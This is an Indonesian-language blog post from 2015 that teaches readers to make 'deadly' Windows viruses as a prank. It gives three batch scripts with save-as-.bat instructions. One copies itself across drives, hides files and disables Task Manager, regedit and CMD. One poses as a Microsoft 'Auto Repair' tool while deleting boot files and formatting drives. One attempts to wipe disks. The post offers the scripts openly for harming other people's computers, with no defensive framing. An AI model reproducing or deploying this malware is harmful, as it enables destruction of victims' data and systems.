Sabtu, 21 Februari 2015

[CARA AMPUH] Membuat Virus Sederhana Yang MEMATIKAN

Posted by Hinodelpa. Category: , ,

Kali ini Saya akan membuat anda menjadi orang jahat + jahil hehhe :v
Sekarang, Saya akan men-share "[CARA AMPUH] Membuat Virus Sederhana Yang MematikanLangsung aja, simak baik baik..




Langsung saja :

VIRUS PERTAMA
Code:
Echo off > C:\virxx.txt
if no exist C:\Windows\%0 copy %0 C:\Windows
for %%p in (A C D E F G H) do copy %0 %%p:
for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v
ShowSuperHiden /t REG_DWORD /d 0 /f
for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
/t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d
C:\Windows\virxx.bat /f
REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d
2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableRegedit /t REG_DWORD /d 1 /f
Shutdown -s -t 360 -c “Virus Menjangkiti Komputer Anda” -f
Exit
Cara membuatnya :
- copy script di atas ke notepad
- save dengan nama "hinodelpatamvan" hahaha terserah kalian kok, trus di akhiri dengan    ekstensi .bat ( contoh : hinodelpatamvan.bat )

Kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :


menghilangkan task manager, run, regedit, folder option, dan akan menyembunyikan file yang berekstensi *.3gp dengan super hidden. Selain itu virus akan berkembang biak dengan mengkopykan dirinya ke drive A, C, D, E, F, G, dan setrusnya. Ngeri kann?



VIRUS KEDUA
Code:
@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%%  /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format  D: /Q /X /y
echo.
Format  E: /Q /X /y
echo.
Format  F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.


Cara membuatnya :
- copy script di atas ke notepad
- save dengan nama hmm, masih terserah kalian kok, trus di akhiri dengan ekstensi .bat ( contoh : hinodelpatamvan.bat )

Kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :

- mengelabuhi user agar seakan-akan ini adalah service windows dalam menemukan sebuah virus dan berusaha memperbaikinya. Padahal ini hanya palsu belaka
- membuat value diregistry agar semua file yang berekstensi exe tidak akan bisa dibuka lagi oleh program default file tersebut.
- menghapus semua file yang dibutuhkan oleh windows untuk memboot
- memformat semua harddisk yang ada di komputer


VIRUS KETIGA
Code:
@echo off
DEL C: -Y
DEL D: -Y


Cara membuatnya :
- copy script di atas ke notepad
- save dengan nama terserah kalian, dan di akhiri dengan ekstensi .bat ( contoh : hinodelpatamvan.bat )

Kerusakan yang bisa di sebabkan jika virus notepad ini di jalankan :

Kalo anda mengklik virus ini, maka seluruh data yang ada di hardisk ente akan hilang tanpa terkecuali. Sehingga, hal ini dapat menyebabkan komputer akan mati total.
Judul: [CARA AMPUH] Membuat Virus Sederhana Yang MEMATIKAN; Ditulis oleh Admin; Rating Blog: 5 dari 5
Posted by: Hilarius Delta Putra
Hinodelpa.com Updated at: 20.00
◄ Posting Baru Posting Lama ►